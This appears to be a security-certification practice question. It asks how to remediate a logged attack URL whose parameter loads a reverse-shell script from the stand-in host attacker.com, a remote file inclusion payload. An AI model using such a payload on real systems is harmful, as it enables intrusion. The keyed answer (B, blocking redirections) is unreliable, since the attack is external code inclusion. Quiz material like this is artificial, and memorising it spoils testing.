While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A . Implement a blacklist.
B . Block URL redirections.
C . Double URL encode the parameters.
D . Stop external calls from the application.
Answer: B